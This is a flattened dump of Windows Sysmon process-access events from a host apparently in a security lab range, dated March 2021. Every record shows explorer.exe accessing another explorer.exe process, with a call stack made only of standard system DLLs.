16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 